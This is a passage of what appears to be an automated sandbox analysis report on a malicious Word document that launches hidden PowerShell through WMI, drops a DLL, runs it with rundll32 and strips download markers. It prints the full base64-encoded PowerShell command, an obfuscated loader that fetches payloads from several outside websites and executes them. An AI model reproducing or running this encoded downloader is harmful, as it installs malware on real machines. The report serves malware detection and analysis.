G4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcA
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FF0027197C push eax; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040100B push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024F090 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023057F push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00452D98 push 00452E25h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00460020 push 00460058h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00454038 push 00454064h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0042A0B2 push 0042A0E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0042A0B4 push 0042A0E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0042B274 push 0042B2CDh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043C34C push 0043C378h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0042E450 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004604F4 push 0046055Ch; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00460498 push 004604EFh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004605F0 push 0046063Ch; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00460580 push 004605ACh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0045B588 push 0045B5CAh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004605B8 push 004605E4h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00460654 push 00460680h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004606C4 push 004606F0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0042D6DC push 0042D751h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0042E6F0 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0046068C push 004606B8h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0042E696 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00428748 push 00428774h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0042E750 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0042D754 push 0042D7ADh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004607E4 push 00460827h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00428798 push 004287C4h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004637A8 push 004637E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00463848 push 00463874h; ret

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvlJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Jonxwll\xztbsp.lei:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
